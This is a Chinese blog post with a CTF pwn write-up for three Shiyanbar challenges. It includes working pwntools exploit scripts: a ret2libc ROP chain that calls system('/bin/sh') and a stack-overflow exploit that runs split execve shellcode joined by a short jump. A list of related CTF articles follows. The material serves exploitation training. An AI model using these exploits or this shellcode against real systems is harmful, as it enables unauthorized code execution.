实验吧 溢出 题解

最新推荐文章于 2024-01-27 12:05:28 发布
最新推荐文章于 2024-01-27 12:05:28 发布
阅读量287 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/96422662
版权

昨天没事 想到了实验吧 去刷了两道逆向题    现在想起来了  实验吧的pwn 就那么几道 想去刷一下

实验吧的  那个题目我好像做过了 

https://blog.csdn.net/qq_41071646/article/details/80640475

我服气了 改个分组非要说我违规,,,

唉,, 没办法凑合着看吧 2018 6月写的

做的时候我对pwn 还没有一点点的认识,,,, 都一年多了鸭,,,

部分逆向题解 wp 这个是不断更新的

https://blog.csdn.net/qq_41071646/article/details/89056010

然后开始 做 实验吧题目,

 

加减乘除

这个题目好像有点意思哈  

让提取 shellcode,,, pwntools 一把梭,,

# -*- coding:utf-8 -*-
import os
import base64
from pwn import*
asm_code = """.global _start
_start:
        jmp     test1
test2:
        pop     ebx
        mov     al, 0xa
        int     0x80
        mov     al, 0x1
        xor     ebx, ebx
        int     0x80
test1:
        call    test2
        .string "delfile" """

shellcode=asm(asm_code).encode('hex')
flag=""
for i in range(0,len(shellcode),2):
	flag+=r'\x'
	flag+=shellcode[i]+shellcode[i+1]
print flag

但是提交就成了这个 玩意,

 不知道怎么回事

ropbaby

好吧  估计是实验吧所有的服务器都挂了 那么我直接本地打通算了

这个ropbaby的溢出点  在这里 

而且这个题目还给了 一个可以看函数的地址的功能

第一个 功能一开始我发现不对,,,  (基址 一看就不对 )

还以为 第二个也不对  后来验证了一下 发现正确那么直接用就好 值得注意的是 这个题目是开启了PIE 所以 ROP 最好去  so库里面找

# -*- coding:utf-8 -*-
import os
import base64
from pwn import*
io=process("./ropbaby")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
pop_rdi=0x21102 
if __name__=="__main__":
	io.recvuntil(":")
	io.sendline('2')
	#gdb.attach(io)
	io.recvuntil("Enter symbol:")
	io.sendline("system")
	io.recvuntil("0x")
	system_addr=int(io.recvline(),16)
	log.success("system_addr:"+hex(system_addr))

	libc_base_addr=system_addr-libc.sym['system']
	log.success("libc base :"+hex(libc_base_addr))

	bin_sh_addr=libc.search("/bin/sh").next()+libc_base_addr
	log.success("bin_sh_addr"+hex(bin_sh_addr))

	pop_rdi=pop_rdi+libc_base_addr

	io.sendline('3')
	payload=p64(0)+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
	io.sendline(str(len(payload)))
	io.sendline(payload)
	io.interactive()
	io.close()

运行结果

这个题算是很简单的题目了,。。

pilot

这个题目保护全关

程序溢出点就是 read  并且 会输出buf的地址 

可以调试确定一下

然后这道题的难点就是 shellcode

本来我是这样写的 自以为会没有什么毛病 可是权限没有拿到  然后我看了一下 shellcode 的大小长度

发现了  是

额,,, 远远超过这个长度   这样的话 我们就有了两个选择,,

要么 再找这样的shellcode    要么再找一个shellcode   要么可以利用短跳转来执行shellcode

#xor rdx, rdx
#mov rbx, 0x68732f6e69622f2f
#shr rbx, 0x8
#push rbx
#mov rdi, rsp
#push rax
#push rdi
#mov rsi, rsp
#mov al, 0x3b
#syscall

我先找了个 比较短的 0x1e 一开始想着 0x1e 应该可以了 毕竟 距离栈底是 0x20

然后调试了一波发现了问题

嗯哼? 被截断了,,,

。。。。 短跳转就没有什么好说的 JMP是最好的选择  不会影响堆栈平衡 和寄存器

E9 是长 EB就是短  EB+偏移就是跳转的

那么 我们这里 改一下

#xor rdx, rdx
#mov rbx, 0x68732f6e69622f2f
#shr rbx, 0x8
#push rbx
#mov rdi, rsp
#push rax
#jmp
#push rdi
#mov rsi, rsp
#mov al, 0x3b
#syscall

直接改到返回地址底下  那一块地址绝对不会再 主函数里面改变

然后执行shellcode的时候把 跳过去就好了

# -*- coding:utf-8 -*-
import os
import base64
from pwn import* 
io=process("./pilot")
#xor rdx, rdx
#mov rbx, 0x68732f6e69622f2f
#shr rbx, 0x8
#push rbx
#mov rdi, rsp
#push rax
#jmp 
#push rdi
#mov rsi, rsp
#mov al, 0x3b
#syscall
if __name__=="__main__":
	shellcode1="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50"
	shellcode1+="\xeb\x18"
	print hex(len(shellcode1))
#xor rdx, rdx
#mov rbx, 0x68732f6e69622f2f
#shr rbx, 0x8
#push rbx
#mov rdi, rsp
#push rax
#jmp 18h
	shellcode2="\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
	#push rdi
	#mov rsi, rsp
	#mov al, 0x3b
	io.recvuntil('Location:')
	buf_addr=int(io.recvline(),16)
	log.success("buf_addr"+hex(buf_addr))
	payload=shellcode1+(40-len(shellcode1))*'a'+p64(buf_addr)
	payload+=shellcode2
	#gdb.attach(io)
	io.sendline(payload)
	io.interactive()
	io.close()

拿到权限

至于这个printf  我在上一篇的格式化漏洞做过这道题

https://blog.csdn.net/qq_41071646/article/details/96148737

结篇,,,

pipixia233333
关注
专栏目录
缓冲区溢出攻击实验(一)
Venscor技术养成之路
11-18 1万+
本周心情异常不好。无聊之余,想弄一下缓冲区溢出实验,之前一直听说这个,也没有亲自动手 做一下,发现真正弄起来的时候还是没那么简单的,其实学到的东西还是不少的。特此记下学习的过程。 一、基础知识 这一部分主要是关于程序内存布局相关的知识,也涉及少量at&t汇编、gdb调试、gcc编译的知识。再次说明本人 非科班出生,所以在有些问题上要比科班出身的要纠结得多,但职业生涯还长,只要
【CTF题解NO.00001】西安电子科技大学网络与信息安全学院2020年网络空间安全专业实验班选拔考试 - write up by arttnba3
arttnba3的博客
08-18 3295
【CTF题解NO.00001】西安电子科技大学网络与信息安全学院2020年网络空间安全专业实验班选拔考试 - write up by arttnba30x00.绪论0x01.PWN (AK)cmcc_stackpwn_canary0x02.reverseBabyre0x03.mischelloencrypt 0x00.绪论 最近这几天网络与信息安全学院搞网络空间安全专业的实验班考试,作为蒟蒻的我抱着试一试的心态混入了考试的大佬之中XDD 说不定再过几天我就从计科院人变成网信院人le 0x01.PWN (
BUUCTF--mrctf2020_shellcode1
qq_30528603的博客
01-27 690
正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。这是一题64位的shellocde题,没啥花招入门题。
PWN利器-pwntools安装、调试教程一览
samli的博客
12-05 6892
pwntools是一个CTF框架和漏洞利用的python开发库,专为快速开发而设计,旨在使漏洞利用编写尽可能简答
pwn学习-中级ROP-1
WocW的博客
03-03 993
CTF-wiki-中级ROP实例复现 ret2csu libc_csu_init函数 ctf-wiki上的 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000000004005C0 __l...
python笔记 - 网络编程(十六)
weixin_42295011的博客
07-20 308
python网络编程的简单实现
xctf pwn1
qq_41071646的博客
05-14 989
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
2019实验班招新ACM题解1
08-04
4. **数据类型选择**:由于字符串长度可能较大,单个字符计数可能会超过`int`类型的最大值,因此选择使用`long`类型来存储计数,确保不会溢出。 5. **内存管理**:注意到在Java代码中,使用了`Scanner`对象读取输入...
微机原理与接口技术习题解析和实验指导.pdf
10-02
"微机原理与接口技术习题解析和实验指导" 微机原理与接口技术是计算机科学和技术专业的基础课程之一,对于计算机系统的设计、开发和应用都具有重要的影响。本文档提供了微机原理与接口技术的习题解析和实验指导,...
c语言-c语言编程基础之leetcode题解第14题最长公共前缀.zip
最新发布
04-19
1. C语言基础:C语言是一种结构化编程语言,由贝尔实验室的Dennis Ritchie在1972年开发。它以其高效、灵活和强大的功能而闻名,是许多现代编程语言的基础。C语言的基本语法包括变量、数据类型、运算符、控制结构(如...
Pwn菜鸡刷题记录 从入门到入土(持续更新ing)
麦芽雪冷萃
10-15 1334
GitHub抢先更新:GitHub - Don2025/CTFwriteUp: The growth record of CTF rookie.The growth record of CTF rookie. Contribute to Don2025/CTFwriteUp development by creating an account on GitHub.https://github.com/Don2025/CTFwriteUp CTFHub ret2text 先file ./ret2text
前端工具包之log美化
weixin_43416898的博客
12-17 959
前言 我们在开发过程中,总会封装一些公共函数来作为我们的工具来简化代码或者复用代码,为此,我打算整理一下我日常工作中常用的一些封装的工具函数,本篇文章主要想实现下面的控制台输出效果,接下来就来看看吧。 系列文章 1.前端工具包之深浅拷贝 2.前端工具包之日期格式化 3.前端工具包之防抖函数 4.前端工具包之小工具 5.前端工具包之log美化 背景 作为一个前端开发者,肯定避免不了F12的控制台调...
CTF必备技能丨Linux Pwn入门教程——ShellCode
dfdhxb995397的博客
07-10 1247
这是一套Linux Pwn入门教程系列,作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的一些题目和文章整理出一份相对完整的Linux Pwn教程。 课程回顾>> Linux Pwn入门教程第一章:环境配置 Linux Pwn入门教程第二章:栈溢出基础 本系列教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式...
Windows x64 栈帧结构
weixin_30748995的博客
08-07 360
0x01 前言   Windows 64位下函数调用约定变为了快速调用约定,前4个参数采用rcx、rdx、r8、r9传递,多余的参数从右向左依次使用堆栈传递。本次文章是对于Windows 64位下函数调用的分析,分析各种参数情况下调用者和被调用函数的栈结构。 0x02 4参数时函数调用流程 64位下函数的调用约定全部用FASTCALL,就是前4个参数依次用rcx,rdx,r8,r...
【shell】脚本中显示成功、错误、警告函数
michaelwoshi的博客
10-01 1475
# cat echo.sh ############################################ #!/bin/bash function log_failure_msg() { echo "$@" "[ FAILED ]" } function log_success_msg() { echo "$@" "[ OK ]" } function log_warnning_msg() { echo "$@" "[ Warn ]" } log_s...
CTF(Pwn) 当题目为我们提供Libc版本.so文件, 与 不提供的区别
半岛铁盒的博客
03-25 4955
做了一道题目,它提供了 libc文件; 这道题 可以使用 libc-2.23.so文件 来 解出来, 也可以不使用; 当使用 libc2.23.so文件时 EXp为 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23.so') elf = ELF('./pwn1') write_plt = elf.plt['write'] write_got = elf.got['write'] main = 0x0804
升级linux系统lib64中的libc.so.6版本
zsw_12345的博客
05-17 7383
wget http://mirror.bjtu.edu.cn/gnu/libc/glibc-2.14.tar.xztar xvf glibc-2.14.tar.gzcd glibc-2.14mkdir buildcd build../configure --prefix=/usr/local/glibc-2.14 // 配置glibc并设置当前glibc-2.14安装目录make make i...
pwn-messageb0x-学习笔记
小龙在线
08-27 490
messageb0x是一个32位的ELF文件,用IDA打开: F5反编译: 关键在于process_info这个函数: v1的输入字符200(0xC8)限制明显大于栈的ebp的58h,所以存在溢出漏洞。 然后Shift+F12查看字符串,看有没有特殊字符串(system),没有: 可以利用 查找libc版本和system的偏移: 攻击脚本: from pwn import * elf = ELF('./messageb0x') sh = process('./messageb0x') puts
虎符CTF2020 部分题目复现(连续更新)
qq_41252520的博客
04-22 1732
PWN 0x0 MarksMan 【保护】: 【代码】: 很明显程序一开始就向我们泄露了libc的内存,如果通过检测,就可以任意地址写3个字节。如果能找到一处可控的调用,直接修改程one_gadget就可以了。 看看这个check检查了什么 这是过滤了部分字节,默认的one_gadget只能查看很少的可用地址,需要加上 -l参数,并指定一个较小的数字,如2,这样就能够得到更多可用地址。 现...
清华大学微机原理与接口技术详解PPT:教材与工作原理概览
2. 教材与参考书:主要参考教材是冯博琴和吴宁主编的《微机原理与接口技术》第三版,以及实验指导书如《微机原理与接口技术实验指导书》和《微机原理与接口技术题解实验指导》。 3. 第一章介绍了微机系统的基础...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值